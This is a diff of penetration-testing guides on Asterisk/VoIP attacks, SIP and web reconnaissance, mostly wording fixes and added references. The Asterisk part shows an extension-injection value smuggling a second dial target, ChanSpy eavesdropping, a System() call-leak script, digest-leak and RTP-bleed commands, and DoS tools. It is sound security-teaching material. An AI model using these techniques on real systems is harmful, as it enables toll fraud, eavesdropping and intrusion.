-### Free Calls / Asterisks Connections Misconfigurations
+### Free calls / legacy Asterisk connection misconfigurations<sup>[[8]](#references)</sup>
 
-In Asterisk it's possible to allow a connection **from an specific IP address** or from **any IP address**:
+The `sip.conf`, `type`, and `insecure` examples below apply to the legacy `chan_sip` driver. Asterisk deprecated `chan_sip` in version 17 and removed it in version 21; assess modern deployments through their `pjsip.conf` endpoint, authentication, address-of-record, and identification objects instead.<sup>[[8]](#references)</sup>
+
+In legacy Asterisk configurations, it is possible to allow a connection **from a specific IP address** or from **any IP address**:
 
 ```
 host=10.10.10.10
 host=dynamic
 ```
 
-If an IP address is specified, the host **won't need to send REGISTER** requests every once in a while (in the REGISTER packet is sent the time to live, usually 30min, which means that in other scenario the phone will need to REGISTER every 30mins). However, it'll need to have open ports allowing connections from the VoIP server to take calls.
+If an IP address is specified, the host **does not need to send periodic REGISTER** requests. Dynamic peers instead refresh their registration before the expiry conveyed by the `Expires` header or the Contact `expires` parameter, commonly every 30 minutes. A statically addressed host must still allow the VoIP server to reach its SIP and media ports for incoming calls.
 
-To define users they can be defined as:
+Legacy `chan_sip` peers can use the following `type` values:
 
 - **`type=user`**: The user can only receive calls as user.
 - **`type=friend`**: It's possible to perform calls as peer and receive them as user (used with extensions)
@@ -407,7 +409,7 @@ It's also possible to establish trust with the insecure variable:
 > `insecure=port,invite`\
 > `type=friend`
 
-### Free Calls / Asterisks Context Misconfigurations
+### Free calls / Asterisk context misconfigurations
 
 In Asterisk a **context** is a named container or section in the dial plan that **groups together related extensions, actions, and rules**. The dial plan is the core component of an Asterisk system, as it defines **how incoming and outgoing calls are handled and routed**. Contexts are used to organize the dial plan, manage access control, and provide separation between different parts of the system.
 
@@ -428,7 +430,7 @@ exten => 100,n,Hangup()
 
 This example demonstrates a simple context called "my_context" with an extension "100". When someone dials 100, the call will be answered, a welcome message will be played, and then the call will be terminated.
 
-This is **another context** that allows to **call to any other number**:
+This is **another context** that allows calls to **any other number**:
 
 ```scss
 [external]
@@ -444,7 +446,7 @@ include => external
 ```
 
 > [!WARNING]
-> Anyone will be able to use the **server to call to any other number** (and the admin of the server will pay for the call).
+> Anyone will be able to use the **server to call any other number** (and the server administrator will pay for the call).
 
 > [!CAUTION]
 > Moreover, by default the **`sip.conf`** file contains **`allowguest=true`**, then **any** attacker with **no authentication** will be able to call to any other number.
@@ -485,8 +487,8 @@ exten => 0,103,GotoIf("$[${numbers}"=""]?100)
 exten => 0,104,Dial(LOCAL/${numbers})
 ```
 
-The previous is a example where the user is asked to **press 1 to call** a department, **2 to call** another, or **the complete extension** if he knows it.\
-The vulnerability is the fact that the indicated **extension length is not checked, so a user could input the 5seconds timeout a complete number and it will be called.**
+The preceding example asks the user to **press 1 to call** one department, **2 to call** another, or enter a **complete extension**.\
+The vulnerability is that the **extension length is not checked**, so a user can enter a complete telephone number during the five-second timeout and cause Asterisk to call it.
 
 ### Extension Injection
 
@@ -502,13 +504,13 @@ Where **`${EXTEN}`** is the **extension** that will be called, when the **ext 10
 exten => 101,1,Dial(SIP/101)
 ```
 
-However, if **`${EXTEN}`** allows to introduce **more than numbers** (like in older Asterisk versions), an attacker could introduce **`101&SIP123123123`** to call the phone number 123123123. And this would be the result:
+However, if **`${EXTEN}`** accepts **characters other than digits** (as in older Asterisk versions), an attacker could supply **`101&SIP123123123`** to call the telephone number 123123123. This would produce the following result:
 
 ```scss
 exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
 ```
 
-Therefore, a call to the extension **`101`** and **`123123123`** will be send and only the first one getting the call would be stablished... but if an attacker use an **extension that bypasses any match** that is being performed but doesn't exist, he could be **inject a call only to the desired number**.
+Therefore, calls to extensions **`101`** and **`123123123`** will be sent, and only the first answered call will be established. If an attacker supplies a nonexistent extension that bypasses the applied matching, the attacker may be able to inject a call only to the desired number.
 
 ## SIPDigestLeak vulnerability
 
@@ -524,7 +526,7 @@ The SIP Digest Leak is a vulnerability that affects a large number of SIP Phones
 6. The **victim phone provides a response to the authentication challenge** in a second BYE
 7. The **attacker can then issue a brute-force attack** on the challenge response on his local machine (or distributed network etc) and guess the password
 
-- **SIPPTS leak** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS leak exploits the SIP Digest Leak vulnerability that affects a large number of SIP Phones. The output can be saved in SipCrack format to bruteforce it using SIPPTS dcrack or the SipCrack tool.<sup>[[1]](#references)</sup>
+- **SIPPTS leak** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS leak exploits the SIP Digest Leak vulnerability that affects many SIP phones. Its output can be saved in SipCrack format and brute-forced with SIPPTS dcrack or SipCrack.<sup>[[1]](#references)</sup>
 
 ```bash
 sippts leak -i 10.10.0.10
@@ -577,11 +579,11 @@ exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecr
 
 ### **Eavesdropping**
 
-In Asterisk it's possible to use the command **`ChanSpy`** indicating the **extension(s) to monitor** (or all of them) to hear conversations that are happening. This command need to be assigned to an extension.
+In Asterisk, **`ChanSpy`** can monitor selected extensions (or all of them) and listen to active conversations. This command must be assigned to an extension.
 
 For example, **`exten => 333,1,ChanSpy('all',qb)`** indicate that if you **call** the **extension 333**, it will **monitor** **`all`** the extensions, **start listening** whenever a new conversation start (**`b`**) in quiet mode (**`q`**) as we don't want to interact on it. You could go from one conversation happening to another pressing **`*`**, or marking the extension number.
 
-It's also possible tu use **`ExtenSpy`** to monitor one extension only.
+It is also possible to use **`ExtenSpy`** to monitor only one extension.
 
 Instead of listening the conversations, it's possible to **record them in files** using an extension such as:
 
@@ -599,11 +601,11 @@ You could also even make Asterisk **execute a script that will leak the call** w
 exten => h,1,System(/tmp/leak_conv.sh &)
 ```
 
-### RTCPBleed vulnerability
+### RTP/RTCP Bleed vulnerabilities
 
 **RTCPBleed** is a major security issue affecting Asterisk-based VoIP servers (published in 2017). The vulnerability allows **RTP (Real Time Protocol) traffic**, which carries VoIP conversations, to be **intercepted and redirected by anyone on the Internet**. This occurs because RTP traffic bypasses authentication when navigating through NAT (Network Address Translation) firewalls.<sup>[[4]](#references)</sup>
 
-RTP proxies try to address **NAT limitations** affecting RTC systems by proxying RTP streams between two or more parties. When NAT is in place, the RTP proxy software often cannot rely on the RTP IP and port information retrieved through signalling (e.g. SIP). Therefore, a number of RTP proxies have implemented a mechanism where such **IP and port tuplet is learned automatically**. This is often done by by inspecting incoming RTP traffic and marking the source IP and port for any incoming RTP traffic as the one that should be responded to. This mechanism, which may be called "learning mode", **does not make use of any sort of authentication**. Therefore **attackers** may **send RTP traffic to the RTP proxy** and receive the proxied RTP traffic meant to be for the caller or callee of an ongoing RTP stream. We call this vulnerability RTP Bleed because it allows attackers to receive RTP media streams meant to be sent to legitimate users.<sup>[[4]](#references)</sup>
+RTP proxies address **NAT limitations** in real-time communication systems by proxying RTP streams between parties. With NAT, a proxy often cannot rely on the RTP address and port advertised through signaling such as SIP. Some proxies therefore learn the **IP-and-port tuple automatically** by inspecting incoming RTP traffic and using its source as the response destination. If this "learning mode" does not authenticate the source, an **attacker can send RTP traffic to the proxy** and receive media intended for a legitimate caller or callee. This is called RTP Bleed.<sup>[[4]](#references)</sup>
 
 Another interesting behaviour of RTP proxies and RTP stacks is that sometimes, **even if not vulnerable to RTP Bleed**, they will **accept, forward and/or process RTP packets from any source**. Therefore attackers can send RTP packets which may allow them to inject their media instead of the legitimate one. We call this attack RTP injection because it allows injection of illegitimate RTP packets into existent RTP streams. This vulnerability may be found in both RTP proxies and endpoints.<sup>[[4]](#references)</sup>
 
@@ -637,7 +639,7 @@ sippts rtpbleedinject -i 10.10.0.10 -p 10070 -f audio.wav
 
 ### RCE
 
-In Asterisk you somehow manage to be able to **add extension rules and reload them** (for example by compromising a vulnerable web manager server), it's possible to get RCE using the **`System`** command.
+If you can **add extension rules and reload them** in Asterisk (for example, after compromising a vulnerable web-management server), the **`System`** command can provide remote code execution.
 
 ```scss
 same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt)
@@ -652,19 +654,19 @@ There is command called **`Shell`** that could be used **instead of `System`** t
 
 - **`sip.conf`** -> Contains the password of SIP users.
 - If the **Asterisk server is running as root**, you could compromise root
-- **mysql root user** might **doesn't have any password**.
+- The **MySQL `root` user** might **have no password**.
   - this could be used to create a new mysql user as backdoor
-- **`FreePBX`**
+- **FreePBX**
   - **`amportal.conf`** -> Contains the password of the web panel administrator (FreePBX)
-  - **`FreePBX.conf`** -> Constains the password of the user FreePBXuser used to access the database
+  - **`FreePBX.conf`** -> Contains the password of the `FreePBXuser` account used to access the database
     - this could be used to create a new mysql user as backdoor
 - **`Elastix`**
-  - **`Elastix.conf`** -> Contains several passwords in clear text like mysql root pass, IMAPd pass, web admin pass
+  - **`Elastix.conf`** -> Contains several cleartext passwords, such as the MySQL `root`, IMAP daemon, and web administrator passwords
 - **Several folders** will belong to the compromised asterisk user (if not running as root). This user can read the previous files and also controls the configuration, so he could make Asterisk to load other backdoored binaries when executed.
 
 ### RTP Injection
 
-It's possible to insert a **`.wav`** in converstions using tools such as **`rtpinsertsound`** (`sudo apt install rtpinsertsound`) and **`rtpmixsound`** (`sudo apt install rtpmixsound`).
+It is possible to insert a **`.wav`** file into conversations with tools such as **`rtpinsertsound`** (`sudo apt install rtpinsertsound`) and **`rtpmixsound`** (`sudo apt install rtpmixsound`).
 
 Or you could use the scripts from [http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/](http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/) to **scan conversations** (**`rtpscan.pl`**), send a `.wav` to a conversation (**`rtpsend.pl`**) and **insert noise** in a conversation (**`rtpflood.pl`**).<sup>[[3]](#references)</sup>
 
@@ -678,7 +680,7 @@ There are several ways to try to achieve DoS in VoIP servers.
   - `sippts ping -i 10.10.0.10`
 - [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX protocol used by Asterisk
 - [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): A tool to perform SIP/SDP INVITE message flooding over UDP/IP.
-- [**rtpflood**](https://www.kali.org/tools/rtpflood/): Send several well formed RTP packets. Its needed to know the RTP ports that are being used (sniff first).
+- [**rtpflood**](https://www.kali.org/tools/rtpflood/): Send several well-formed RTP packets. You need to identify the RTP ports in use first.
 - [**SIPp**](https://github.com/SIPp/sipp): Allows to analyze and generate SIP traffic. so it can be used to DoS also.
 - [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP swiss army knife. Can also be used to perform SIP attacks.
 - Fuzzers: [**protos-sip**](https://www.kali.org/tools/protos-sip/), [**voiper**](https://github.com/gremwell/voiper).
@@ -695,7 +697,7 @@ The easiest way to install a software such as Asterisk is to download an **OS di
 - [4] [RTP Bleed](https://www.rtpbleed.com/)
 - [5] [SIP Digest Leak vulnerability](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf)
 - [6] [Practical VoIP Penetration Testing](https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4)
+- [7] [IANA – Session Initiation Protocol (SIP) Parameters](https://www.iana.org/assignments/sip-parameters/sip-parameters.xhtml)
+- [8] [Asterisk Documentation – Configuring the deprecated `chan_sip` driver](https://docs.asterisk.org/Configuration/Channel-Drivers/SIP/Configuring-chan_sip/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-

--- a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md
+++ b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md
@@ -2,7 +2,7 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basic information<sup>[[4]](#references)</sup>
 
 SIP (Session Initiation Protocol) is a **signaling and call control protocol** widely used for establishing, modifying, and terminating multimedia sessions, including voice, video, and instant messaging, over IP networks. Developed by the **Internet Engineering Task Force (IETF)**, SIP is defined in **RFC 3261** and has become the de facto standard for VoIP and unified communications.
 
@@ -17,7 +17,7 @@ Some key features of SIP include:
 
 Despite its many advantages, SIP can be complex to configure and manage, particularly when dealing with NAT traversal and firewall issues. However, its versatility, scalability, and extensive support across the industry make it a popular choice for VoIP and multimedia communication.
 
-### SIP Methods
+### SIP methods<sup>[[4]](#references)</sup>
 
 The core SIP methods defined in **RFC 3261** include:
 
@@ -29,8 +29,8 @@ The core SIP methods defined in **RFC 3261** include:
 6. **REGISTER**: Used by a user agent to **register its current location with a SIP registrar server**. The REGISTER method helps in maintaining an up-to-date mapping between a user's SIP URI and their current IP address, enabling call routing and delivery.
 
 > [!WARNING]
-> Note that to call someone it's **not neccesary to use the REGISTER** for anything.\
-> However, it's possible that in order to perform an **INVITE** the caller needs to **authenticate** first or he will receive a **`401 Unauthorized`** response.
+> A caller does **not need to use `REGISTER`** to call another party.\
+> The caller may nevertheless need to authenticate before sending an **`INVITE`**, or the server will return **`401 Unauthorized`**.
 
 In addition to these core methods, there are **several SIP extension methods** defined in other RFCs, such as:
 
@@ -41,7 +41,7 @@ In addition to these core methods, there are **several SIP extension methods** d
 5. **UPDATE**: Defined in RFC 3311, the UPDATE method allows **modifying a session without affecting the state of the existing dialog**. This is useful for updating session parameters, such as codecs or media types, during an ongoing call.
 6. **PUBLISH**: Defined in RFC 3903, the PUBLISH method is used by a user agent to **publish event state information to a server**, making it available to other interested parties.
 
-### SIP Response Codes
+### SIP response codes<sup>[[5]](#references)</sup>
 
 - **1xx (Provisional Responses)**: These responses indicate that the request was received, and the server is continuing to process it.
   - 100 Trying: The request was received, and the server is working on it.
@@ -71,7 +71,7 @@ In addition to these core methods, there are **several SIP extension methods** d
   - 603 Decline: The callee does not wish to participate in the call.
   - 604 Does Not Exist Anywhere: The requested resource is not available anywhere in the network.
 
-## Examples
+## Examples<sup>[[4]](#references)</sup>
 
 ### SIP INVITE Example
 
@@ -272,7 +272,7 @@ This section adds practical, protocol-specific tips without duplicating the broa
 ### SIP Digest Authentication: algorithms and cracking
 
 - SIP commonly uses HTTP-Digest style auth. Historically MD5 (and MD5-sess) are prevalent; newer stacks support SHA-256 and SHA-512/256 per RFC 8760.<sup>[[2]](#references)</sup> Prefer these stronger algorithms in modern deployments and disable MD5 when possible.
-- Offline cracking from a pcap is trivial for MD5 digests. After extracting the challenge/response, you can use hashcat mode 11400 (SIP digest, MD5):
+- Offline cracking from a PCAP is practical for weak MD5 digests. After extracting the challenge/response, you can use Hashcat mode 11400 (SIP digest, MD5):
   
   ```bash
   # Example hash format (single line)
@@ -353,5 +353,7 @@ a=candidate:AAAA...[oversized candidate line]...
 - [1] [Rapid7: CVE-2026-0826 - Critical unauthenticated stack buffer overflow in HP Poly VVX and Trio VoIP Phones](https://www.rapid7.com/blog/post/ve-cve-2026-0826-critical-unauthenticated-stack-buffer-overflow-hp-poly-vvx-trio-voip-phones-fixed/)
 - [2] [RFC 8760 – Using SHA-256 and SHA-512/256 for HTTP Digest (applies to SIP Digest too)](https://www.rfc-editor.org/rfc/rfc8760)
 - [3] [Asterisk Security Advisory GHSA-qqxj-v78h-hrf9 for CVE-2024-35190](https://github.com/asterisk/asterisk/security/advisories/GHSA-qqxj-v78h-hrf9)
+- [4] [RFC 3261 – SIP: Session Initiation Protocol](https://www.rfc-editor.org/rfc/rfc3261)
+- [5] [IANA – Session Initiation Protocol (SIP) Parameters](https://www.iana.org/assignments/sip-parameters/sip-parameters.xhtml)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/README.md
+++ b/src/network-services-pentesting/pentesting-web/README.md
@@ -4,9 +4,9 @@
 
 ## Basic Info
 
-The web service is the most **common and extensive service** and a lot of **different types of vulnerabilities** exists.
+Web services are among the most **common and extensive attack surfaces**, and many different vulnerability classes can affect them.
 
-**Default port:** 80 (HTTP), 443(HTTPS)
+**Default ports:** 80 (HTTP) and 443 (HTTPS)
 
 ```bash
 PORT    STATE SERVICE
@@ -27,13 +27,13 @@ web-api-pentesting.md
 
 ## Methodology summary
 
-> In this methodology we are going to suppose that you are going to a attack a domain (or subdomain) and only that. So, you should apply this methodology to each discovered domain, subdomain or IP with undetermined web server inside the scope.
+> This methodology assumes that you are assessing one domain or subdomain at a time. Apply it to every discovered in-scope domain, subdomain, or IP address that exposes an unidentified web server.
 
 - [ ] Start by **identifying** the **technologies** used by the web server. Look for **tricks** to keep in mind during the rest of the test if you can successfully identify the tech.
   - [ ] Any **known vulnerability** of the version of the technology?
-  - [ ] Using any **well known tech**? Any **useful trick** to extract more information?
+  - [ ] Is it using any **well-known technology**? Are there **useful techniques** for extracting more information?
   - [ ] Any **specialised scanner** to run (like wpscan)?
-- [ ] Launch **general purposes scanners**. You never know if they are going to find something or if the are going to find some interesting information.
+- [ ] Launch **general-purpose scanners**. They may identify a vulnerability or provide useful information for manual testing.
 - [ ] Start with the **initial checks**: **robots**, **sitemap**, **404** error and **SSL/TLS scan** (if HTTPS).
 - [ ] Start **spidering** the web page: It's time to **find** all the possible **files, folders** and **parameters being used.** Also, check for **special findings**.
   - [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be spidered._
@@ -41,7 +41,7 @@ web-api-pentesting.md
   - [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
 - [ ] **Backups checking**: Test if you can find **backups** of **discovered files** appending common backup extensions.
 - [ ] **Brute-Force parameters**: Try to **find hidden parameters**.
-- [ ] Once you have **identified** all the possible **endpoints** accepting **user input**, check for all kind of **vulnerabilities** related to it.
+- [ ] Once you have identified all possible endpoints that accept user input, check them for every relevant vulnerability class.
   - [ ] [Follow this checklist](../../pentesting-web/web-vulnerabilities-methodology.md)
 
 ## Server Version (Vulnerable?)
@@ -118,14 +118,14 @@ If the web application is using any well known **tech/platform listed before** o
 
 ### Source Code Review
 
-If the **source code** of the application is available in **github**, apart of performing by **your own a White box test** of the application there is **some information** that could be **useful** for the current **Black-Box testing**:
+If the application's source code is available on **GitHub**, perform a white-box review and use the following information to improve black-box testing:
 
 - Is there a **Change-log or Readme or Version** file or anything with **version info accessible** via web?
-- How and where are saved the **credentials**? Is there any (accessible?) **file** with credentials (usernames or passwords)?
+- How and where are **credentials** stored? Is any accessible file exposing usernames or passwords?
 - Are **passwords** in **plain text**, **encrypted** or which **hashing algorithm** is used?
 - Is it using any **master key** for encrypting something? Which **algorithm** is used?
 - Can you **access any of these files** exploiting some vulnerability?
-- Is there any **interesting information in the github** (solved and not solved) **issues**? Or in **commit history** (maybe some **password introduced inside an old commit**)?
+- Do GitHub issues (open or closed) or the commit history contain useful information, such as a password committed in an older revision?
 
 {{#ref}}
 code-review-tools.md
@@ -183,7 +183,7 @@ joomlavs.rb #https://github.com/rastating/joomlavs
 
 **Forcing errors**
 
-Web servers may **behave unexpectedly** when weird data is sent to them. This may open **vulnerabilities** or **disclosure sensitive information**.
+Web servers may behave unexpectedly when malformed data is sent to them. This may expose vulnerabilities or disclose sensitive information.
 
 - Access **fake pages** like /whatever_fake.php (.aspx,.html,.etc)
 - **Add "[]", "]]", and "[["** in **cookie values** and **parameter** values to create errors
@@ -197,12 +197,12 @@ If you find that **WebDav** is **enabled** but you don't have enough permissions
 - **Brute Force** credentials
 - **Upload files** via WebDav to the **rest** of **found folders** inside the web page. You may have permissions to upload files in other folders.
 
-### **SSL/TLS vulnerabilites**
+### SSL/TLS vulnerabilities
 
-- If the application **isn't forcing the user of HTTPS** in any part, then it's **vulnerable to MitM**
+- If the application does not enforce HTTPS for sensitive functionality, it may be vulnerable to man-in-the-middle attacks.
 - If the application is **sending sensitive data (passwords) using HTTP**. Then it's a high vulnerability.
 
-Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vulnerabilities** (In Bug Bounty programs probably these kind of vulnerabilities won't be accepted) and use [**a2sv** ](https://github.com/hahwul/a2sv)to recheck the vulnerabilities:
+Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to check for vulnerabilities and [**a2sv**](https://github.com/hahwul/a2sv) to verify findings. Many bug-bounty programs do not accept low-impact TLS configuration reports:
 
 ```bash
 ./testssl.sh [--htmlfile] 10.10.10.10:443
@@ -220,10 +220,10 @@ Information about SSL/TLS vulnerabilities:
 
 ### Spidering
 
-Launch some kind of **spider** inside the web. The goal of the spider is to **find as much paths as possible** from the tested application. Therefore, web crawling and external sources should be used to find as much valid paths as possible.
+Launch a **spider** against the application. Combine crawling with external sources to discover as many valid paths as possible.
 
 - [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder in JS files and external sources (Archive.org, CommonCrawl.org, VirusTotal.com).
-- [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, with LinkFider for JS files and Archive.org as external source.
+- [**hakrawler**](https://github.com/hakluke/hakrawler) (Go): HTML spider with LinkFinder-style JavaScript discovery and Archive.org as an external source.
 - [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, also indicates "juicy files".
 - [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. It also searches in Archive.org
 - [**meg**](https://github.com/tomnomnom/meg) (go): This tool isn't a spider but it can be useful. You can just indicate a file with hosts and a file with paths and meg will fetch each path on each host and save the response.
@@ -241,13 +241,13 @@ Launch some kind of **spider** inside the web. The goal of the spider is to **fi
 - [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Content discovery tool mixing several options of the previous tools
 - [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): A Burp extension to find path and params in JS files.
 - [**BurpJSLinkFinder Enhanced**](https://github.com/panchocosil/burp-js-linkfinder-enhanced): Burp extension (Jython) that passively analyzes JavaScript responses (by MIME type and `/js` paths) to extract endpoints/links and optionally flag embedded secrets with severity.<sup>[[1]](#references)</sup>
-- [**Sourcemapper**](https://github.com/denandz/sourcemapper): A tool that given the .js.map URL will get you the beatified JS code
+- [**Sourcemapper**](https://github.com/denandz/sourcemapper): Given a `.js.map` URL, retrieves the beautified JavaScript source.
 - [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): This is a tool used to discover endpoints for a given target.
 - [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Discover links from the wayback machine (also downloading the responses in the wayback and looking for more links)
 - [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes.
 - [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals.
 - [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code.
-- [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge is a simple **Burp Suite extension** to **extract the paramters and endpoints** from the request to create custom wordlist for fuzzing and enumeration.
+- [**ParaForge**](https://github.com/Anof-cyber/ParaForge): A Burp Suite extension that extracts parameters and endpoints from requests to create custom wordlists for fuzzing and enumeration.
 - [**katana**](https://github.com/projectdiscovery/katana) (go): Awesome tool for this.
 - [**Crawley**](https://github.com/s0rg/crawley) (go): Print every link it's able to find.
 
@@ -256,13 +256,13 @@ Launch some kind of **spider** inside the web. The goal of the spider is to **fi
 Start **brute-forcing** from the root folder and be sure to brute-force **all** the **directories found** using **this method** and all the directories **discovered** by the **Spidering** (you can do this brute-forcing **recursively** and appending at the beginning of the used wordlist the names of the found directories).\
 Tools:
 
-- **Dirb** / **Dirbuster** - Included in Kali, **old** (and **slow**) but functional. Allow auto-signed certificates and recursive search. Too slow compared with th other options.
+- **Dirb** / **Dirbuster** - Included in Kali; old and slow, but functional. They support self-signed certificates and recursive search.
 - [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: It doesn't allow auto-signed certificates but** allows recursive search.
 - [**Gobuster**](https://github.com/OJ/gobuster) (go): It allows auto-signed certificates, it **doesn't** have **recursive** search.
 - [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.**
 - [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
 - [**ffuf** ](https://github.com/ffuf/ffuf)- Fast: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
-- [**uro**](https://github.com/s0md3v/uro) (python): This isn't a spider but a tool that given the list of found URLs will to delete "duplicated" URLs.
+- [**uro**](https://github.com/s0md3v/uro) (Python): Not a spider; it normalizes a list of discovered URLs and removes functionally duplicated entries.
 - [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Burp Extension to create a list of directories from the burp history of different pages
 - [**TrashCompactor**](https://github.com/michael1026/trashcompactor): Remove URLs with duplicated functionalities (based on js imports)
 - [**Chamaleon**](https://github.com/iustin24/chameleon): It uses wapalyzer to detect used technologies and select the wordlists to use.
@@ -280,7 +280,6 @@ Tools:
 - [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
 - [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)
 - [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)
-- [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
 - [https://github.com/ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths)
 - _/usr/share/wordlists/dirb/common.txt_
 - _/usr/share/wordlists/dirb/big.txt_
@@ -290,7 +289,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri
 
 ### What to check on each file found
 
-- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
+- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Finds broken links in HTML that may be susceptible to takeover.
 - **File Backups**: Once you have found all the files, look for backups of all the executable files ("_.php_", "_.aspx_"...). Common variations for naming a backup are: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ You can also use the tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
 - **Discover new parameters**: You can use tools like [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **to discover hidden parameters. If you can, you could try to search** hidden parameters on each executable web file.
   - _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
@@ -299,7 +298,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri
   - _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
 - **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**.
   - If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** (using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page.
-- **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](https://github.com/l4yton/RegHex)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
+- **API keys**: If you find an API key, use platform-specific guidance and secret-scanning tools such as [**keyhacks**](https://github.com/streaak/keyhacks), [**zile**](https://github.com/xyele/zile.git), [**TruffleHog**](https://github.com/trufflesecurity/truffleHog), [**SecretFinder**](https://github.com/m4ll0k/SecretFinder), [**RegHex**](https://github.com/l4yton/RegHex), [**DumpsterDiver**](https://github.com/securing/DumpsterDiver), and [**EarlyBird**](https://github.com/americanexpress/earlybird).
   - Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) to check which apis the key can access.
 - **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/index.html).
 
@@ -310,17 +309,17 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri
 **Interesting files**
 
 - Look for **links** to other files inside the **CSS** files.
-- [If you find a _**.git**_ file some information can be extracted](git.md)
-- If you find a _**.env**_ information such as api keys, dbs passwords and other information can be found.
+- [If you find an exposed _**.git**_ directory, recover and inspect its repository data](git.md).
+- An exposed _**.env**_ file may contain API keys, database passwords, and other secrets.
 - If you find **API endpoints** you [should also test them](web-api-pentesting.md). These aren't files, but will probably "look like" them.
-- **JS files**: In the spidering section several tools that can extract path from JS files were mentioned. Also, It would be interesting to **monitor each JS file found**, as in some ocations, a change may indicate that a potential vulnerability was introduced in the code. You could use for example [**JSMon**](https://github.com/robre/jsmon)**.**
+- **JS files**: The spidering section lists tools that extract paths from JavaScript. Monitor discovered JavaScript files because a change may introduce vulnerable functionality; [**JSMon**](https://github.com/robre/jsmon) can help.
   - You should also check discovered JS files with [**RetireJS**](https://github.com/retirejs/retire.js/) or [**JSHole**](https://github.com/callforpapers-source/jshole) to find if it's vulnerable.
